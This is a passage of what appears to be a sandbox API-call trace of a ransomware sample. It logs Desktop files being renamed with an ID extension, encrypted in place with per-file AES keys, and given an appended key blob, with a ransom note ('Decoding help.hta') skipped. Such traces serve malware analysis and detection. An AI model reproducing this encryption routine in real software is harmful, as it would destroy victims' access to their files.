(in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Decoding help.hta" [0046.148] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\decoding help.hta")) returned 0x1 [0046.148] lstrcmpiW (lpString1="Decoding help.hta", lpString2="hTefMhnvMK.flv") returned -1 [0046.148] lstrlenW (lpString="hTefMhnvMK.flv") returned 14 [0046.148] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" [0046.148] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned 45 [0046.148] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="hTefMhnvMK.flv" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hTefMhnvMK.flv") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hTefMhnvMK.flv" [0046.148] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hTefMhnvMK.flv" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hTefMhnvMK.flv") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hTefMhnvMK.flv" [0046.148] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hTefMhnvMK.flv", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hTefMhnvMK.flv.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hTefMhnvMK.flv.[ID]g9uZrLhJaygpwRm1[ID]" [0046.149] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hTefMhnvMK.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\htefmhnvmk.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hTefMhnvMK.flv.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\htefmhnvmk.flv.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0046.150] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hTefMhnvMK.flv.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\htefmhnvmk.flv.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x46c [0046.150] CreateFileMappingA (hFile=0x46c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x3c0 [0046.150] CryptAcquireContextA (in: phProv=0x51cfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x51cfcec*=0x34491c0) returned 1 [0046.150] CryptGenKey (in: hProv=0x34491c0, Algid=0x6610, dwFlags=0x1, phKey=0x51cfce8 | out: phKey=0x51cfce8*=0x671cb0) returned 1 [0046.151] CryptExportKey (in: hKey=0x671cb0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x51cfbe4, pdwDataLen=0x51cfce4 | out: pbData=0x51cfbe4*, pdwDataLen=0x51cfce4*=0x2c) returned 1 [0046.151] MapViewOfFile (hFileMappingObject=0x3c0, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13b60) returned 0x3240000 [0046.152] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x51cfbe4*, pdwDataLen=0x51cfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x51cfbe4*, pdwDataLen=0x51cfcf8*=0x100) returned 1 [0046.152] CryptEncrypt (in: hKey=0x671cb0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3240000, pdwDataLen=0x51cfce4*=0x13b60, dwBufLen=0x13b60 | out: pbData=0x3240000*, pdwDataLen=0x51cfce4*=0x13b60) returned 1 [0046.153] UnmapViewOfFile (lpBaseAddress=0x3240000) returned 1 [0046.155] CloseHandle (hObject=0x3c0) returned 1 [0046.155] CryptDestroyKey (hKey=0x671cb0) returned 1 [0046.155] CryptReleaseContext (hProv=0x34491c0, dwFlags=0x0) returned 1 [0046.155] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0046.155] WriteFile (in: hFile=0x46c, lpBuffer=0x51cfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x51cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x51cfbe4*, lpNumberOfBytesWritten=0x51cfcf8*=0x100, lpOverlapped=0x0) returned 1 [0046.156] WriteFile (in: hFile=0x46c, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x51cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x51cfcf8*=0x500, lpOverlapped=0x0) returned 1 [0046.157] CloseHandle (hObject=0x46c) returned 1 [0046.158] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hTefMhnvMK.flv.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0046.159] FindNextFileW (in: hFindFile=0x5a58f0, lpFindFileData=0x51cfd30 | out: lpFindFileData=0x51cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf428b030, ftCreationTime.dwHighDateTime=0x1d4d362, ftLastAccessTime.dwLowDateTime=0x36d6410, ftLastAccessTime.dwHighDateTime=0x1d4d4ca, ftLastWriteTime.dwLowDateTime=0x36d6410, ftLastWriteTime.dwHighDateTime=0x1d4d4ca, nFileSizeHigh=0x0, nFileSizeLow=0xa07c, dwReserved0=0x0, dwReserved1=0x0, cFileName="jAtLio6.doc", cAlternateFileName="")) returned 1 [0046.159] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" [0046.159] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned 45 [0046.159] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Decoding help.hta" [0046.159] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\decoding help.hta")) returned 0x1 [0046.159] lstrcmpiW (lpString1="Decoding help.hta", lpString2="jAtLio6.doc") returned -1 [0046.159] lstrlenW (lpString="jAtLio6.doc") returned 11 [0046.159] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" [0046.159] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned 45 [0046.159] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="jAtLio6.doc" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jAtLio6.doc") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jAtLio6.doc" [0046.159] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jAtLio6.doc" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jAtLio6.doc") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jAtLio6.doc" [0046.159] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jAtLio6.doc", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jAtLio6.doc.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jAtLio6.doc.[ID]g9uZrLhJaygpwRm1[ID]" [0046.159] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jAtLio6.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jatlio6.doc"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jAtLio6.doc.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jatlio6.doc.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0046.160] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jAtLio6.doc.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jatlio6.doc.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x46c [0046.160] CreateFileMappingA (hFile=0x46c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x3c0 [0046.161] CryptAcquireContextA (in: phProv=0x51cfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x51cfcec*=0x34491c0) returned 1 [0046.161] CryptGenKey (in: hProv=0x34491c0, Algid=0x6610, dwFlags=0x1, phKey=0x51cfce8 | out: phKey=0x51cfce8*=0x671c70) returned 1 [0046.161] CryptExportKey (in: hKey=0x671c70, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x51cfbe4, pdwDataLen=0x51cfce4 | out: pbData=0x51cfbe4*, pdwDataLen=0x51cfce4*=0x2c) returned 1 [0046.161] MapViewOfFile (hFileMappingObject=0x3c0, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa060) returned 0x2fe0000 [0046.163] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x51cfbe4*, pdwDataLen=0x51cfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x51cfbe4*, pdwDataLen=0x51cfcf8*=0x100) returned 1 [0046.163] CryptEncrypt (in: hKey=0x671c70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2fe0000, pdwDataLen=0x51cfce4*=0xa060, dwBufLen=0xa060 | out: pbData=0x2fe0000*, pdwDataLen=0x51cfce4*=0xa060) returned 1 [0046.163] UnmapViewOfFile (lpBaseAddress=0x2fe0000) returned 1 [0046.165] CloseHandle (hObject=0x3c0) returned 1 [0046.165] CryptDestroyKey (hKey=0x671c70) returned 1 [0046.165] CryptReleaseContext (hProv=0x34491c0, dwFlags=0x0) returned 1 [0046.165] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0046.165] WriteFile (in: hFile=0x46c, lpBuffer=0x51cfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x51cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x51cfbe4*, lpNumberOfBytesWritten=0x51cfcf8*=0x100, lpOverlapped=0x0) returned 1 [0046.166] WriteFile (in: hFile=0x46c, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x51cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x51cfcf8*=0x500, lpOverlapped=0x0) returned 1 [0046.166] CloseHandle (hObject=0x46c) returned 1 [0047.566] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jAtLio6.doc.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0050.375] FindNextFileW (in: hFindFile=0x5a58f0, lpFindFileData=0x51cfd30 | out: lpFindFileData=0x51cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x938ec5a0, ftCreationTime.dwHighDateTime=0x1d4d332, ftLastAccessTime.dwLowDateTime=0xf2ae3ee0, ftLastAccessTime.dwHighDateTime=0x1d4d296, ftLastWriteTime.dwLowDateTime=0xf2ae3ee0, ftLastWriteTime.dwHighDateTime=0x1d4d296, nFileSizeHigh=0x0, nFileSizeLow=0xd5a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="l0VJss53KdONvC.m4a", cAlternateFileName="L0VJSS~1.M4A")) returned 1 [0050.375] lstrcpyW (in: lpString1=0x25197a78, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" [0050.375] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned 45 [0050.375] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Decoding help.hta" [0050.375] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\decoding help.hta")) returned 0x1 [0050.375] lstrcmpiW (lpString1="Decoding help.hta", lpString2="l0VJss53KdONvC.m4a") returned -1 [0050.375] lstrlenW (lpString="l0VJss53KdONvC.m4a") returned 18 [0050.375] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" [0050.375] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned 45 [0050.375] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="l0VJss53KdONvC.m4a" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\l0VJss53KdONvC.m4a") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\l0VJss53KdONvC.m4a" [0050.375] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\l0VJss53KdONvC.m4a" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\l0VJss53KdONvC.m4a") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\l0VJss53KdONvC.m4a" [0050.375] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\l0VJss53KdONvC.m4a", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\l0VJss53KdONvC.m4a.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\l0VJss53KdONvC.m4a.[ID]g9uZrLhJaygpwRm1[ID]" [0050.375] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\l0VJss53KdONvC.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\l0vjss53kdonvc.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\l0VJss53KdONvC.m4a.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\l0vjss53kdonvc.m4a.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0052.255] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\l0VJss53KdONvC.m4a.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\l0vjss53kdonvc.m4a.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x57c [0052.255] CreateFileMappingA (hFile=0x57c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x3c0 [0052.255] CryptAcquireContextA (in: phProv=0x51cfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x51cfcec*=0x3449e80) returned 1 [0054.928] CryptGenKey (in: hProv=0x3449e80, Algid=0x6610, dwFlags=0x1, phKey=0x51cfce8 | out: phKey=0x51cfce8*=0x5d8690) returned 1 [0054.928] CryptExportKey (in: hKey=0x5d8690, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x51cfbe4, pdwDataLen=0x51cfce4 | out: pbData=0x51cfbe4*, pdwDataLen=0x51cfce4*=0x2c) returned 1 [0054.928] MapViewOfFile (hFileMappingObject=0x3c0, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd5a0) returned 0x2d0000 [0054.930] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x51cfbe4*, pdwDataLen=0x51cfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x51cfbe4*, pdwDataLen=0x51cfcf8*=0x100) returned 1 [0054.930] CryptEncrypt (in: hKey=0x5d8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2d0000, pdwDataLen=0x51cfce4*=0xd5a0, dwBufLen=0xd5a0 | out: pbData=0x2d0000*, pdwDataLen=0x51cfce4*=0xd5a0) returned 1 [0054.931] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0054.933] CloseHandle (hObject=0x3c0) returned 1 [0054.933] CryptDestroyKey (hKey=0x5d8690) returned 1 [0054.933] CryptReleaseContext (hProv=0x3449e80, dwFlags=0x0) returned 1 [0054.933] SetFilePointerEx (in: hFile=0x57c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0054.933] WriteFile (in: hFile=0x57c, lpBuffer=0x51cfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x51cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x51cfbe4*, lpNumberOfBytesWritten=0x51cfcf8*=0x100, lpOverlapped=0x0) returned 1 [0056.949] WriteFile (in: hFile=0x57c, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x51cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x51cfcf8*=0x500, lpOverlapped=0x0) returned 1 [0056.949] CloseHandle (hObject=0x57c) returned 1 [0056.950] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\l0VJss53KdONvC.m4a.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0058.504] FindNextFileW (in: hFindFile=0x5a58f0, lpFindFileData=0x51cfd30 | out: lpFindFileData=0x51cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8216dc30, ftCreationTime.dwHighDateTime=0x1d4c906, ftLastAccessTime.dwLowDateTime=0x3c679550, ftLastAccessTime.dwHighDateTime=0x1d4c6a2, ftLastWriteTime.dwLowDateTime=0x3c679550, ftLastWriteTime.dwHighDateTime=0x1d4c6a2, nFileSizeHigh=0x0, nFileSizeLow=0x16b2e, dwReserved0=0x0, dwReserved1=0x0, cFileName="L6TswLa8.wav", cAlternateFileName="")) returned 1 [0058.504] lstrcpyW (in: lpString1=0x2a6a0048, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" [0058.505] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned 45 [0058.505] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Decoding help.hta" [0058.505] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\decoding help.hta")) returned 0x1 [0058.505] lstrcmpiW (lpString1="Decoding help.hta", lpString2="L6TswLa8.wav") returned -1 [0058.505] lstrlenW (lpString="L6TswLa8.wav") returned 12 [0058.505] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" [0058.505] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned 45 [0058.505] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="L6TswLa8.wav" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\L6TswLa8.wav") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\L6TswLa8.wav" [0058.505] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\L6TswLa8.wav" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\L6TswLa8.wav") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\L6TswLa8.wav" [0058.505] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\L6TswLa8.wav", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\L6TswLa8.wav.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\L6TswLa8.wav.[ID]g9uZrLhJaygpwRm1[ID]" [0058.505] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\L6TswLa8.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\l6tswla8.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\L6TswLa8.wav.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\l6tswla8.wav.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.506] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\L6TswLa8.wav.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\l6tswla8.wav.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x57c [0058.506] CreateFileMappingA (hFile=0x57c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x520 [0058.506] CryptAcquireContextA (in: phProv=0x51cfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x51cfcec*=0x2aac6b28) returned 1 [0060.227] CryptGenKey (in: hProv=0x2aac6b28, Algid=0x6610, dwFlags=0x1, phKey=0x51cfce8 | out: phKey=0x51cfce8*=0x5e2b30) returned 1 [0060.227] CryptExportKey (in: hKey=0x5e2b30, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x51cfbe4, pdwDataLen=0x51cfce4 | out: pbData=0x51cfbe4*, pdwDataLen=0x51cfce4*=0x2c) returned 1 [0060.227] MapViewOfFile (hFileMappingObject=0x520, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x16b20) returned 0x49b0000 Thread: id = 162 os_tid = 0x788 [0040.281] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Adobe\\*.*", lpFindFileData=0x530fd30 | out: lpFindFileData=0x530fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe4efbbe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe4efbbe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a59b0 [0040.281] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.281] FindNextFileW (in: hFindFile=0x5a59b0, lpFindFileData=0x530fd30 | out: lpFindFileData=0x530fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe4efbbe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe4efbbe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.281] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.281] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.281] FindNextFileW (in: hFindFile=0x5a59b0, lpFindFileData=0x530fd30 | out: lpFindFileData=0x530fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, 